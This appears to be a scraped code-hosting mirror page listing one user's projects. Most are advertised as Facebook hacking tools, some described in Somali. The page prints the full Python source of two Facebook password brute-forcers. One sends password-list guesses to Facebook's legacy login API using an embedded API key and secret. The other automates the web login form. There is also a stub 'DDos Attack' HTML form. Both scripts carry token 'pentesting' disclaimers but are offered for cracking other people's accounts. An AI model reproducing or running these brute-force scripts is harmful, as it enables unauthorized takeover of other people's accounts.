Giter Site home page Giter Site logo

rdh4ck3r's Projects

asu icon asu

facebook hacking toolkit

farxad icon farxad

Waxad ku gabsan karta facebook kasta adoo isticmalaya ID Address ka

farxad- icon farxad-

Waxad ku jabsan karya facebook kasta adoo isticmalaya ID Address

fb-cracker icon fb-cracker

ute.py - Facebook Brute Force # -*- coding: utf-8 -*- ## import os import sys import urllib import hashlib API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32" __banner__ = """ +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ |#Author: DedSecTL <dtlily> | |#Contact: Telegram @dtlily | |#Date: Fri Feb 8 10:15:49 2019 | |#This tool is made for pentesting. | |#Changing the description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ """ print("[+] Facebook Brute Force\n") userid = raw_input("[*] Enter [Email|Phone|Username|ID]: ") try: passlist = raw_input("[*] Set PATH to passlist: ") if os.path.exists(passlist) != False: print(__banner__) print(" [+] Account to crack : {}".format(userid)) print(" [+] Loaded : {}".format(len(open(passlist,"r").read().split("\n")))) print(" [+] Cracking, please wait ...") for passwd in open(passlist,'r').readlines(): sys.stdout.write(u"\u001b[1000D[*] Trying {}".format(passwd.strip())) sys.stdout.flush() sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET) xx = hashlib.md5(sig).hexdigest() data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx) response = urllib.urlopen("https://api.facebook.com/restserver.php?{}".format(data)).read() if "error" in response: pass else: print("\n\n[+] Password found .. !!") print("\n[+] Password : {}".format(passwd.strip())) break print("\n\n[!] Done .. !!") else: print("fbbrute: error: No such file or directory") except KeyboardInterrupt:

fb-hack icon fb-hack

Ku jabso facebook asxavtada adoo isticmalaya ID Facebook ga

fbkks icon fbkks

<!--Plis Like My Code ! by:Player Gileade--> <!DOCTYPE html> <html> <head> <title>DDos Maker Attack</title> </head> <body> <h1>DDos Attack</h1> <form class="form" name="form"> <input type="text" id="t1" placeholder="www.targetsite.com" maxlength="30" required="required" minlength="8">Site</input></br></br> <input type="checkbox" id="a1">1000 Packages</input></br></br> <input type="checkbox" id="ll">5000 Packages</input></br></br> <input type="checkbox" id="dd">15000 Packages</input></br></br> <input type="checkbox" id="zz">64500 Packages</input></br></br> <button onclick="geral()">Send</button> </form> </body> </html>

hackingtool icon hackingtool

All in one complete professional hacking toolkit for termux, kali and any other linux distro

uy icon uy

#!usr/bin/python #Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall ! #This program is for educational purposes only. #Don't attack people facebook accounts it's illegal ! #If you want to crack into someone's account, you must have the permission of the user. #InfosecHacker is not responsible. import sys import random import cookielib import mechanize GHT = ''' +=========================================+ |..........Facebook Cracker v 2...........| +-----------------------------------------+ |#Author: RdH4CK3r modified | || |#Date: 23/10/2015 | |#This tool is made for pentesting. | |#Changing the Description of this tool | |Won't made you the coder ^_^ !!! | |#Respect Coderz ^_^ | |#I take no responsibilities for the | | use of this program ! | +=========================================+ |..........Facebook Cracker v 2...........| +-----------------------------------------+ ''' print ("Note:- This tool can crack facebook account even if you don't have the email of your victim") print ("# Hit CTRL+C to quit the program") print ("# Use www.graph.facebook.com for more infos about your victim") email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : ")) passwordlist = str(raw_input("Enter the name of the password list file : ")) useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] login = 'https://www.facebook.com/login.php?login_attempt=1' def attack(password): try: sys.stdout.write("\r[*] trying %s.. " % password) sys.stdout.flush() br.addheaders = [('User-agent', random.choice(useragents))] site = br.open(login) br.select_form(nr=0) ##Facebook br.form['email'] =email br.form['pass'] = password br.submit() log = br.geturl() if log == login: print ("\n\n\n [*] Password found .. !!") print ("\n [*] Password : %s\n") % (password) sys.exit(1) except KeyboardInterrupt: print ("\n[*] Exiting program .. ") sys.exit(1) def search(): global password for password in passwords: attack(password.replace("\n","")) def check(): global br global passwords try: br = mechanize.Browser() cj = cookielib.LWPCookieJar() br.set_handle_robots(False) br.set_handle_equiv(True) br.set_handle_referer(True) br.set_handle_redirect(True) br.set_cookiejar(cj) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) except KeyboardInterrupt: print ("\n[*] Exiting program ..\n") sys.exit(1) try: list = open(passwordlist, "r") passwords = list.readlines() k = 0 while k < len(passwords): passwords[k] = passwords[k].strip() k += 1 except IOError: print ("\n [*] Error: check your password list path \n") sys.exit(1) except KeyboardInterrupt: print ("\n [*] Exiting program ..\n") sys.exit(1) try: print (GHT) print (" [*] Account to crack : %s") % (email) print (" [*] Loaded :") , len(passwords), "passwords" print (" [*] Cracking, please wait ...") except KeyboardInterrupt: print ("\n [*] Exiting program ..\n") sys.exit(1) try: search() attack(password) except KeyboardInterrupt: print ("\n [*] Exiting program ..\n") sys.exit(1) if __name__ == '__main__': check()

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.